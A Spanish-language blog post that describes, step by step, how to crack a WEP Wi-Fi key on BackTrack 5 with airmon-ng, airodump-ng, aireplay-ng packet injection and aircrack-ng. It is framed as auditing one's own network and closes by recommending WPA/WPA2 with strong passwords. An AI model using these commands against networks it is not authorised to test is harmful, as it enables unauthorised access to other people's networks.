Anuncios

ANUNCIOS PATROCINADOS

Auditoria a redes wifi con Mini Cazadora usb 3bumen

Leave a Comment
minicazadora wifi

Hace unos días adquirí una minicazadora wifi de 3bumen  para probar mis conocimientos y probar distros especializadas en auditoria y seguridad wi-fi,primero comencé mi odisea con Linux Beini 1.25 cuya pagina es http://beini.es/beini-1-2-5/ lo descargue por que al ser la ultima versión se supone que estaría actualizado y por consiguiente incluiría soporte para mi minicazadora,pero no fue así una vez iniciado beini me encuentro con que no soporta mi usb wifi o simplemente no la carga así que fue en vano la descarga de beini...
Luego baje wifislax y xiaopan estas me reconocieron la minicazadora pero con el minidwep-gtk  pase eternidades esperando tener una cantidad de paquetes decente para empezar la desencriptacion con aircrack-ng pero a pesar de pasar horas esperando nunca lo logré,así que termine descargando backtrack 5 se demoro un poco ya que la versión de 64 bits pesa casi 2 gigas. así que seguí los siguientes pasos:

grabe la imagen de backtrack en un dvd en blanco y reinicie mi pc y bootie desde el dvd

bactrack 5

una vez termine la carga de archivos y se auto configure se quedara en modo texto,osea como si fuera solo consola y yo como descargue la versión con gnome para iniciar el modo gráfico solo se debe teclear

startx
y presionar enter de inmediato se cargara el entorno gráfico de backtrack y aunque abrimos el entorno grafico todo lo haremos por consola.


airmon-ng 

Esto nos enseñara nuestra tarjeta de red wifi 

2: entraremos a modo gráfico 

airmon-ng start "el nombre del adaptador de tu tarjeta wifi" (por lo general es wlan0) 

3: volvemos a introducir: 

airmon-ng 

observaremos que ya tenems 2 tarjetas "wlan0" y "mon0" <--- (también varia su nombre) 

4: iniciamos en gráfico la tarjeta mon0 como en el paso 2 

airmon-ng start mon0 

5: introduciremos 

airodump-ng mon0 

esto les mostrara  todas las redes disponibles empezara a buscar redes cercanas... 



PWR: significa la intensidad de señal de la red a auditar
Beacons : son como datos 
Data: es como el trafico 
CH: es el canal 
ENC : tipo de proteccion tiene que ser wep 
ESSID: nombre del modem o red
 

6.- ya que tengamos localizada nuestra red para probar su seguridad aplicamos ctrl + c para parar la búsqueda 
y metemos el comando 

airodump-ng -c (a continuacion el numero del canal) -w redes (es el nombre del archivo com se guardara nuestra clave ) --bssid (copeamos la bssid de la red a auditar y la pegamos aca ) mon0 

y listo nuestra red empezó a generar trafico , el data tiene que llegar a 30.000 de data o mas para que nos de la clave 


Va muy lento nunca lo lograre? 

7.- inyectaremos datas o trafico para eso se usa el comando en otra consola 

aireplay-ng -1 0 -a (aqui la mac) mon0 

Una vez que diga, succesfull conexión o algo parecido es porque podemos inyectar trafico para esto... 

8.- 

aireplay-ng -3 -b (aca la mac) mon0 


y listo veras como empieza a inyectar paquetes... 

9.- te pasas a la otra consola donde tiene que llegar a 30 000 o mas de data y observas el data que avanza mas rápido si no es asi entonces estas demasiado lejos de tu router.

10.- una vez llegado a 30 000 aplicas ctrl+c en todas las consolas y es hora de la verdad 

11.- tecleas 

dir

12.- 

aircrack-ng redes-01.cap 
redes-01.cap se reemplaza por el nombre del archivo cap que se genero anteriormente.

y empezara a desencriptar la clave web y listo una vez que diga KEY FOUND es esa la clave .

Por lo general las el cifrado tipo wep es muy vulnerable,asi que es recomendable usar wpa y wpa2 con contraseñas compuestas por simbolos,numeros y letras mayusculas y minisculas para aumentar la seguridad de tu red wifi.

0 comentarios :

Publicar un comentario

Por favor deje su comentario de acuerdo al tema tratado,no se permite polemica,spam,insultos o armar debates fuera de tono.

Related Posts Plugin for WordPress, Blogger...
Mi perfil de Google +